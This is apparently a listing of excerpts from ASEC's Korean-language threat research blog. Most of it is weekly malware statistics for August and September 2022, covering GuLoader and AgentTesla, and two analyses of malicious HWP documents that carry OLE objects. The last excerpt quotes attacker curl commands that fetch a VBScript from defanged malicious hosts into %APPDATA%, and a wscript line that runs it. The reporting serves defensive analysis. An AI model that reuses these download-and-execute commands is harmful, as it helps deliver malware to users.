ASEC 주간 악성코드 통계 (20220829 ~ 20220904)

ASEC 분석팀에서는 ASEC 자동 분석 시스템 RAPIT 을 활용하여 알려진 악성코드들에 대한 분류 및 대응을 진행하고 있다. 본 포스팅에서는 2022년 8월 29일 월요일부터 9월 4일 일요일까지 한 주간 수집된 악성코드의 통계를 정리한다. 대분류 상으로는 인포스틸러가 45.9%로 1위를 차지하였으며, 그 다음으로는 다운로더 악성코드가 28.1%, 백도어 18.5%, 랜섬웨어 6.2%, 코인마이너 및 뱅킹 악성코드가 각각 0.7%로 집계되었다. Top 1 – GuLoader 22.6%를 차지하는 GuLoader 는 추가 악성코드를 다운로드하여 실행시키는 다운로더 악성코드이다. 과거에는 진단을 우회하기 위해 Visual Basic 언어로 패킹되어 있었으나 최근에는 NSIS 인스톨러…

ASEC 주간 악성코드 통계 (20220822 ~ 20220828)

ASEC 분석팀에서는 ASEC 자동 분석 시스템 RAPIT 을 활용하여 알려진 악성코드들에 대한 분류 및 대응을 진행하고 있다. 본 포스팅에서는 2022년 8월 22일 월요일부터 8월 28일 일요일까지 한 주간 수집된 악성코드의 통계를 정리한다. 대분류 상으로는 인포스틸러가 41.0%로 1위를 차지하였으며, 그 다음으로는 백도어 악성코드가 31.8%, 다운로더 21.4%, 랜섬웨어 5.8%로 집계되었다. Top 1 –  Agent Tesla 인포스틸러 악성코드인 AgentTesla가 23.7%로 1위를 기록하였다. AgentTesla는 웹 브라우저, 메일 및 FTP 클라이언트 등에 저장된 사용자 정보를 유출하는 인포스틸러 유형의 악성코드이다. 수집한 정보 유출 시 메일을 활용하며 FTP나 Discord API 등을…

프로필 양식 위장한 한글문서 (OLE개체)

ASEC 분석팀은 최근 OLE 개체 및 플래쉬 취약점 이용한 악성 한글 문서를 확인하였다. 해당 취약점은 2020년 공유한 <한글문서(HWP) 내부 플래쉬 취약점 이용한 새로운 공격> 게시글에서 소개되었으며, 이번에 확인된 파일에도 당시와 동일한 악성 URL을 사용하고 있다. 해당 URL에는 여전히 플래시 취약점(CVE-2018-15982) 파일이 업로드되어 있어 사용자의 주의가 필요하다. 확인된 한글 파일 내부에는 OLE 개체가 삽입되어 있으며 해당 파일들은 한글 문서 실행 시 %TEMP% 폴더에 생성된다. 생성되는 파일은 다음과 같다. 기존에 알려진 powershell.exe, mshta.exe 파일을 바로 이용하지 않고, %TEMP% 경로에 복사하여 이용한 점은…

ASEC 주간 악성코드 통계 (20220815 ~ 20220821)

ASEC 분석팀에서는 ASEC 자동 분석 시스템 RAPIT 을 활용하여 알려진 악성코드들에 대한 분류 및 대응을 진행하고 있다. 본 포스팅에서는 2022년 8월 15일 월요일부터 8월 21일 일요일까지 한 주간 수집된 악성코드의 통계를 정리한다. 대분류 상으로는 인포스틸러가 57.8%로 1위를 차지하였으며, 그 다음으로는 백도어 악성코드가 24.2%, 다운로더 13.7%, 랜섬웨어 3.7%, 코인마이너 악성코드가 0.6%로 집계되었다. Top 1 –  Agent Tesla 인포스틸러 악성코드인 AgentTesla가 38.5%로 1위를 기록하였다. AgentTesla는 웹 브라우저, 메일 및 FTP 클라이언트 등에 저장된 사용자 정보를 유출하는 인포스틸러 유형의 악성코드이다. 수집한 정보 유출 시 메일을 활용하며 FTP나…

생일 축하 내용으로 위장한 악성 한글 문서 (OLE 개체)

ASEC 분석팀은 최근 악성 한글 파일을 다운로드 하는 VBScript를 확인하였다. 해당 악성코드의 정확한 유포경로는 확인되지 않았지만 VBScript는 curl을 통해 다운로드 된다. 현재 확인된 명령어는 다음과 같다. curl  -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp 두 명령어 모두 %APPDATA% 폴더에 vbtemp 명으로 스크립트를 저장한다. hxxp://datkka.atwebpages[.]com/2vbs 에는 아래 그림과 같이 작업 스케줄러 등록 및 추가 파일 다운로드 등의 기능을 수행하는 VBScript 코드가 존재한다. 다운로드 된 vbtemp 파일은 wscript  //e:vbscript //b %APPDATA%\vbtemp 명령을 통해 실행된다….